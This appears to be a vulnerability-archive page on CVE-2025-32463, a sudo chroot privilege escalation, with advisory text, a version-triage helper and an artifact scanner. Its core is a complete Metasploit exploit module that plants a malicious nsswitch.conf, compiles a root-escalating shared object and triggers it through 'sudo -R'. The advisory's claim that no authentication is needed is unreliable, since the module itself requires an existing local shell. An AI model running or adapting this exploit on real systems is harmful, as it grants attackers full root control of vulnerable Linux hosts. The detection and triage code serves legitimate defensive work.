Sudo Chroot 1.9.17 Privilege Escalation

Vulnerability information

Vulnerability name: Sudo Chroot 1.9.17 Privilege Escalation

Vulnerability ID:

  • CVE: CVE-2025-32463

Vulnerability type: Privilege escalation

Severity: High

Description: Sudo is a program widely used on Unix-like operating systems that allows users to run programs with the privileges of another user, typically the superuser. It is designed to let system administrators delegate privileges while providing an audit trail of system command usage. Sudo is very common across many deployment scenarios, especially in enterprise environments that require fine-grained privilege control.

The vulnerability lies in Sudo's chroot feature, which lets a user pass the chroot option when executing a command. The option is intended to run a command under a user-specified root directory (if the sudoers file permits it). A change in version 1.9.14 allows paths to be resolved through chroot, using the user-specified root directory, while sudoers is still being evaluated. This lets an attacker trick Sudo into loading an arbitrary shared object, resulting in privilege escalation.

The technical root cause is a flaw in Sudo's path-resolution logic when handling the chroot option, which allows an attacker to bypass the intended security restrictions. An attacker can exploit this vulnerability to execute arbitrary code on the system and obtain root privileges. The attack requires no user interaction and can be exploited without authentication, so it constitutes a serious security risk. An attacker who successfully exploits this vulnerability can take complete control of the system, leading to data leakage, service disruption or other malicious activity.

Product: Sudo

Affected versions: 1.9.14 <= version < 1.9.17p1
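The affected range above is easy to get wrong in an inventory sweep because sudo's "p1" suffix is a patch level, not a pre-release tag: 1.9.17p1 is newer than 1.9.17, whereas generic version parsers tend to sort it lower. The following Ruby helper is an added example for triaging package-manager version strings against the stated range; it is not part of the page or of the Metasploit module, and the hostnames and version strings in SAMPLE_INVENTORY are constructed.

```ruby
require 'rubygems'

# Added example (not from the page or the Metasploit module): version triage
# for the affected range 1.9.14 <= version < 1.9.17p1, treating sudo's "p<N>"
# suffix as a patch level (1.9.17p1 is NEWER than 1.9.17).

# Parse "major.minor.patch[pN][-distro suffix]" into a comparable array
# [major, minor, patch, patchlevel]; a missing patch level counts as 0.
# Anything after the upstream version (e.g. "-3ubuntu5") is ignored here;
# a distribution may have backported the fix under such a version string,
# so treat a "vulnerable" result as "needs verification", not as proof.
def parse_sudo_version(str)
  m = str.strip.match(/\A(\d+)\.(\d+)\.(\d+)(?:p(\d+))?/)
  raise ArgumentError, "unrecognised sudo version: #{str.inspect}" unless m
  [m[1].to_i, m[2].to_i, m[3].to_i, (m[4] || 0).to_i]
end

VULN_FROM = parse_sudo_version('1.9.14')   # first affected release (range from the page)
FIXED_AT  = parse_sudo_version('1.9.17p1') # first fixed release

# True when the version falls inside [1.9.14, 1.9.17p1).
def vulnerable_sudo?(str)
  v = parse_sudo_version(str)
  (v <=> VULN_FROM) >= 0 && (v <=> FIXED_AT) < 0
end

# Demonstrates the pitfall: RubyGems' Gem::Version treats any letters as a
# pre-release marker, so it sorts the patched 1.9.17p1 BELOW 1.9.17.
def gem_version_misorders?(patched = '1.9.17p1', base = '1.9.17')
  Gem::Version.new(patched) < Gem::Version.new(base)
end

# Constructed inventory: hostname => sudo version as reported by the package manager.
SAMPLE_INVENTORY = {
  'web-01'   => '1.9.15p5-3ubuntu5',
  'db-01'    => '1.9.17p1',
  'build-01' => '1.9.13p3',
  'ci-02'    => '1.9.17',
  'legacy-9' => '1.8.32'
}.freeze

# Return the hostnames whose sudo falls inside the affected range, in inventory order.
def triage_hosts(inventory)
  inventory.select { |_host, ver| vulnerable_sudo?(ver) }.keys
end

if __FILE__ == $PROGRAM_NAME
  triage_hosts(SAMPLE_INVENTORY).each do |host|
    puts "#{host}: sudo #{SAMPLE_INVENTORY[host]} is in the affected range"
  end
  puts "Gem::Version sorts 1.9.17p1 before 1.9.17: #{gem_version_misorders?}"
end
```

The explicit four-element array is what makes 1.9.17 (patch level 0) compare below 1.9.17p1; a check built on a generic version class would report the fixed release as affected.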

Source: https://github.com/rapid7/metasploit-framework/blob/bb093d928746117ef6833c82536af9ebf2c7929b/modules%2Fexploits%2Flinux%2Flocal%2Fsudo_chroot_cve_2025_32463.rb

Type: rapid7/metasploit-framework:github issues

POC details


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Post::Linux::Packages
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sudo Chroot 1.9.17 Privilege Escalation',
        'Description' => %q{
          Sudo before version 1.9.17p1 allows a user to use the `chroot` option when
          executing a command. The option is intended to run a command with a
          user-selected root directory (if the sudoers file allows it). A change in
          version 1.9.14 allows resolving paths via `chroot` using the user-specified
          root directory while sudoers is still being evaluated.
          This allows the attacker to trick Sudo into loading an arbitrary shared
          object, thus resulting in a privilege escalation.
        },
        'License' => MSF_LICENSE,

        'Author' => [
          'msutovsky-r7', # module dev
          'Stratascale',  # poc dev
          'Rich Mirch'    # security research
        ],
        'Platform' => [ 'linux' ],

        'Arch' => [ ARCH_CMD ],

        # mkdir/chmod has some issues for meterpreter, forcing shell
        'SessionTypes' => [ 'shell' ],

        'Targets' => [[ 'Auto', {} ]],

        'Privileged' => true,

        'References' => [
          [ 'EDB', '52352' ],
          [ 'URL', 'https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/' ],
          [ 'CVE', '2025-32463' ]
        ],
        'DisclosureDate' => '2025-06-30',

        'DefaultTarget' => 0,

        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    # force exploit is used to bypass the check command results
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
    ]
  end

  def check
    sudo_version = installed_package_version('sudo')

    return CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.blank?

    return CheckCode::Safe if !file?('/etc/nsswitch.conf')

    return CheckCode::Appears("Running version #{sudo_version}") if Rex::Version.new(sudo_version).between?(Rex::Version.new('1.9.14'), Rex::Version.new('1.9.17'))

    CheckCode::Safe("Sudo #{sudo_version} is not vulnerable")
  end

  def exploit
    # Check if we're already root
    if !datastore['ForceExploit'] && is_root?
      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
    end

    # needs to compile in real-time to adjust payload execution path
    fail_with Failure::NotFound, 'Module needs to compile payload on target machine' unless live_compile?

    payload_file = rand_text_alphanumeric(5..10)

    existing_shell = cmd_exec('echo $0 || echo ${SHELL}')

    # the original used `return Failure::..., msg` here, which silently returns an array; fail_with is the module's own idiom
    fail_with Failure::NotFound, 'Could not find shell' unless file?(existing_shell)

    upload_and_chmodx("#{datastore['WritableDir']}/#{payload_file}", "#!#{existing_shell}\n#{payload.encoded}")

    register_files_for_cleanup("#{datastore['WritableDir']}/#{payload_file}")

    temp_dir = "#{datastore['WritableDir']}/#{rand_text_alphanumeric(5..10)}"

    base_dir = rand_text_alphanumeric(5..10)

    lib_filename = rand_text_alphanumeric(5..10)

    mkdir(temp_dir)

    cd(temp_dir)

    mkdir("#{base_dir}/etc")
    mkdir('libnss_')

    fail_with Failure::PayloadFailed, 'Failed to create malicious nsswitch.conf file' unless write_file("#{base_dir}/etc/nsswitch.conf", "passwd: /#{lib_filename}\n")

    fail_with Failure::PayloadFailed, 'Failed to copy /etc/group' unless copy_file('/etc/group', "#{base_dir}/etc/group")

    exploit_code = %<
      #include <unistd.h>

      __attribute__((constructor))
      void exploit(void) {
        setreuid(0,0);
        execve("#{datastore['WritableDir']}/#{payload_file}", NULL, NULL);
      }>

    upload_and_compile("#{temp_dir}/libnss_/#{lib_filename}.so.2", exploit_code, "-shared -fPIC -Wl,-init,#{base_dir}")

    cmd_exec("sudo -R #{base_dir} #{base_dir}")

    timeout = 30
    print_status 'Launching exploit...'
    output = cmd_exec 'command', nil, timeout
    output.each_line { |line| vprint_status line.chomp }
  end
end
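The module declares ARTIFACTS_ON_DISK and IOC_IN_LOGS as side effects, and its layout is specific: a fake root with etc/nsswitch.conf and etc/group, and an NSS module at libnss_/<name>.so.2 under a scratch directory. Because the shared object is loaded while sudoers is still being evaluated, i.e. before sudo would normally write its command log line, the on-disk artifacts are the more dependable signal. The following Ruby scanner is an added example, not part of the page or the Metasploit module; the directory names, file contents and the sample tree it builds are constructed, and it assumes scratch roots such as /tmp, /var/tmp or /dev/shm are passed on the command line.

```ruby
require 'tmpdir'
require 'fileutils'

# Added example (not from the page or the Metasploit module): scan scratch
# directories for the artifacts the module above leaves behind. Every path
# and file name below is constructed for the demonstration.

# True if nsswitch.conf routes a database through an absolute path instead of
# a plain NSS service name such as "files" or "sss".
def nsswitch_points_at_path?(content)
  content.each_line.any? { |l| l =~ %r{\A\s*\w+:\s*/\S+} }
end

# Scan the given roots and return an array of human-readable findings.
def scan_for_chroot_artifacts(roots)
  findings = []
  roots.each do |root|
    # 1. nsswitch.conf has no legitimate reason to exist below a scratch dir;
    #    the module drops one at <fake_root>/etc/nsswitch.conf.
    Dir.glob(File.join(root, '**', 'etc', 'nsswitch.conf')).each do |path|
      content = begin
        File.read(path)
      rescue SystemCallError
        ''
      end
      detail = nsswitch_points_at_path?(content) ? ' (routes a lookup through an absolute path)' : ''
      findings << "nsswitch.conf outside /etc: #{path}#{detail}"
    end

    # 2. NSS modules belong under the system library paths. glibc builds the
    #    module name as "libnss_<service>.so.2", so a service of "/name" turns
    #    into the relative path "libnss_/name.so.2"; flag any *.so* file whose
    #    name or parent directory (relative to the root) starts with "libnss_".
    Dir.glob(File.join(root, '**', '*.so*')).each do |path|
      rel = path.sub(%r{\A#{Regexp.escape(root)}/?}, '')
      next unless rel.split(File::SEPARATOR).any? { |c| c.start_with?('libnss_') }
      findings << "NSS shared object outside system library paths: #{path}"
    end
  end
  findings
end

# Build a constructed tree mirroring the module's layout, plus two benign
# files, so the scanner can be exercised offline.
def build_sample_tree(base)
  fake_root = File.join(base, 'abc')
  FileUtils.mkdir_p(File.join(fake_root, 'etc'))
  File.write(File.join(fake_root, 'etc', 'nsswitch.conf'), "passwd: /xyz\n")
  File.write(File.join(fake_root, 'etc', 'group'), "root:x:0:\n")
  FileUtils.mkdir_p(File.join(base, 'libnss_'))
  File.write(File.join(base, 'libnss_', 'xyz.so.2'), "placeholder, not a real ELF\n")
  FileUtils.mkdir_p(File.join(base, 'build'))
  File.write(File.join(base, 'build', 'libfoo.so'), "benign build output\n")
  File.write(File.join(base, 'notes.txt'), "nothing to see\n")
end

# Create the sample tree in a temporary directory, scan it and return the
# findings; the directory is removed when the block exits.
def run_demo
  Dir.mktmpdir('chroot-scan') do |dir|
    build_sample_tree(dir)
    scan_for_chroot_artifacts([dir])
  end
end

if __FILE__ == $PROGRAM_NAME
  # Real use: ruby scan.rb /tmp /var/tmp /dev/shm ; with no arguments, scan the sample tree.
  (ARGV.empty? ? run_demo : scan_for_chroot_artifacts(ARGV)).each { |f| puts f }
end
```

On the sample tree the scanner reports exactly two findings (the fake nsswitch.conf and the libnss_/xyz.so.2 module) and ignores the benign build output; a cleanup that removed only the payload file, as the module's register_files_for_cleanup does, would leave both behind.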
http://example.com/2025/07/30/github_2640227637/
Author: lianccc
Published: 30 July 2025